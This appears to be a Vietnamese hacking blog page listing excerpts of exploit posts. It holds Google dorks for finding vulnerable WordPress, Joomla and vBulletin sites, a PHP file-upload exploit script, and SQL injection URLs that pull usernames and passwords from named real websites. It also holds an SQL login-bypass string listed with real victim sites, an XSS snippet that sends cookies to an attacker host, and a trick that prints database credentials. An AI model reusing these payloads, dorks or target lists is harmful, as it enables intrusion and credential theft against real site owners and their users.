Một người bạn đã đưa cho tôi bài viết này.
Backdoor trong modem D-Link và khai thác với chrome
reverse engineering đối với firmware của modem D-Link và phát hiện trong
đó có một cách có thể để bất cứ người nào truy cập trực tiếp vào modem
D-Link.
Rõ ràng đây là dụng ý của nhà sản xuất firmware…Đoạn code có dạng:
Mã:...
Hiển thị các bài đăng có nhãn Exploit. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Exploit. Hiển thị tất cả bài đăng
WordPress Curvo Themes - CSRF File Upload
################################################## #################################################
# Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability
# Author: Byakuya
# Date: 10/26/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/
# Infected File: upload_handler.php
# Google dork: inurl:/wp-content/themes/curvo/
##################################################...
Xem Thêm
Powered by Cyberjee Bypass Login Page Vulnerability
# Exploit : Login page bypass
#
# Location : [Target]/login.php Location 2 : [Target]/admin
#
# Username : '=' 'or'
#
# Password : '=' 'or'
######################
# Proof:
#
# http://www.dumarsgrill.com/admin/index.php
#
# http://www.tripplesperfumes.com/login.php
#
# http://johnnyswatches.com/admin/
#
# http://www.timefactoryinc.com/admin/admin_panel.php
#
# http://www.blakesbarbq.biz/admin/index.php
#
#
#
#...
Xem Thêm
Wordpress WP Realty Plugin - Blind SQL Injection
$$$$$$\ $$\ $$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ __$$\
$$ / \__| $$ | $$ | $$ / \__|
$$ |$$$$\ $$$$$$$$ | \$$$$$$\
$$ |\_$$ | $$ __$$ | \____$$\
$$ | $$ | $$ | $$ | $$\ $$ |
\$$$$$$ |$$\ $$ | $$ |$$\\$$$$$$ |
\______/ \__|\__| \__|\__|\______/
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
#...
Xem Thêm
Wordpress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload Vulnerability
Exploit :
Code:
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print...
Xem Thêm
Whmcs 5.2.7 sqli injection
So, Friends and Enemies :p here is the Lastest Vulnerability Leaked in Black Hackers Market for WHMCS
Vulnerability Effects:
/includes/dbfunctions.php:
<?php function update_query($table, $array, $where) { #[...]
if (substr($value, 0, 11) == 'AES_ENCRYPT') { $query .=
$value.','; continue; } #[...] $result =
mysql_query($query, $whmcsmysql); } ?> ...
Xem Thêm
Exploit Com_Redmystic
Dork: inurl:/index.php?option=com_redmystic
http://www.discount-espresso.co.uk/media/r.php
Quăng link vào và Exploit. Nếu thành công sẽ xuất hiện link upload...
Xem Thêm
[TUT] - Khai thác lỗi Microsoft IIS tilde character
Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker
có thể đoán được tên các file hay folder mà bình thường họ không thể
thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"
Attack details:
Demo trên site http://hp-aptech.edu.vn
Đầu...
Xem Thêm
Joomla Shell Upload Vulnerability
requirements:1.minduse this google dork to find vulnerable joomla sites ## google dork : inurl:index.php?option=com_fabrikafter open the sites replace with this address ##index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1for example ##"www.xyz.com/index.php" to "www.xyz.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1"
after...
Xem Thêm
IFrame Injection Attacks
Kỹ thuật tấn công theo kiểu IFrame
Injection hiện vẫn đang là 1 dạng xâm nhập cơ bản và phổ biến nhất của
mô hình Cross-Site Scripting – XSS. Bằng cách chèn vào các
website động (ASP, PHP, CGI, JSP … ) những thẻ HTML hay những đoạn mã
script nguy hiểm, trong đó những đoạn mã nguy hiểm đựơc chèn vào hầu hết
được viết bằng các Client-Site Script như JavaScript, JScript, DHTML...
Xem Thêm
WordPress plugin W3 Total Cache critical Vulnerability disclosed

One of the most popular Wordpress Plugin called "W3 Total Cache"
which is used to Improve site performance and user experience via
caching, having potential vulnerability. On Christmas day, someone
disclose it on full-disclosure site that how a plugin misconfiguration
leads to possible Wordpress cms hack.
The...
Xem Thêm
Khai thác lỗ hổng XSS/CSS trên Facebook

Cross Site Scripting (còn được gọi là XSS hay CSS) là một trong những kỹ thuật tấn công tầng ứng dụng (L7) phổ biến nhất.
Thông thường, hầu hết kiểu khai thác Cross-Site Scripting đều liên quan
đến việc gửi cookie của nạn nhân tới máy của kẻ tấn công thông qua
Javascript.
<script>
document.write("<img src='http://attackersite/a.gif?x="...
Xem Thêm
Xenotix XSS Exploit Framework v.2 Released
Xenotix XSS Exploit Framework
is a penetration testing tool to detect and exploit XSS vulnerabilities
in Web Applications. This tool can inject codes into a webpage which
are vulnerable to XSS.
test report.
Features:
Built in XSS Payloads
XSS Key logger
XSS Executable Drive-by downloader
Automatic XSS Testing
XSS Encoder
XSS Reverse Shell (new)
Download: https://www.owasp...
Xem Thêm
Multiple MySQL database Zero-day vulnerabilities published

Researcher discovered
Multiple Zero-day vulnerabilities in MySQL database software including
Stack based buffer overrun, Heap Based Overrun, Privilege Elevation,
Denial of Service and Remote Preauth User Enumeration.
Common Vulnerabilities and Exposures (CVE) assigned as :
CVE-2012-5611 — MySQL (Linux) Stack based buffer...
Xem Thêm
Hướng dẫn khắc phục 2 lỗi bảo mật nghiêm trọng của vBulletin
2 lỗi mà mình nói đến là lỗi SQL Injection của mod Chang stat và lỗi CSRF để add plugin.
1. Lỗi SQL Injection của Changuondyu Statistics
Khi khai thác lỗi này, attacker sẽ lấy được gần như toàn bộ database của
bạn nếu muốn. Và thông thường, cái attacker nhắm đến là table user. Khi
lấy được 3 cột: userid, password và salt => Attacker...
Xem Thêm
vBulletin 3.x <= 4.2.0 FAQ (Echo config) trick
Go to acp, Faq Manager and then edit a FAQ, add the following code:
{$vbulletin->config['MasterServer']['servername']}
{$vbulletin->config['MasterServer']['username']}
{$vbulletin->config['MasterServer']['password']}
{$vbulletin->config['Database']['dbname']}
Save it.
Go to http://[path]/faq.php and check it
# 1337day.com [2012-12-0...
Xem Thêm
Bug Bounty – Paypal có chơi đẹp?
Bug Bounty là chương trình tìm kiếm lỗ hổng bảo mật và thông báo cho
đơn vị tổ chức và nhận giải thưởng. Các lỗ hổng tìm được sẽ được cung
cấp duy nhất cho nhà tổ chức.
Nhiều trang web nổi tiếng như Facebook, Google, Paypal, Mozilla, Barracuda Networks chi hàng nghìn USD để trao giải thưởng cho các hacker tìm ra lỗi.
Paypal Bug Bounty...
Xem Thêm
WebShell remote Configuration excution

webShell 4.O remote Configuration excution
vulnerable url : http://website.com/picture.php?file=_mysql.php
Dorks : ext:php intitle:webSPELL v4.0
"inurl:/picture.php?file="
Find vulnerable website and goto http://website.com/picture.php?file=_mysql.php
you'll...
Xem Thêm
"Testing Image collection" shell and files upload vulnrablity
Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
intitle:"Testing Image Collections"
Goto Google or Bing and Type Dork
inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or
intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option
Now...
Xem Thêm
6 Random Injections
1
Mã:
http://www.elansystems.co.za/product-item.php?product_items_id=-11
UNION SELECT
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username,
0x3b,password),5,6,7,8,9,10 from users_tbl--
2/
Mã:
http://www.nbjm-sprayer.com/products.php?id=-1
UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1
9,20,21,22,23 from user_table--
3/
Mã:
http://www.mcdonaldlawoffice.net/story.php?articleid=-8
...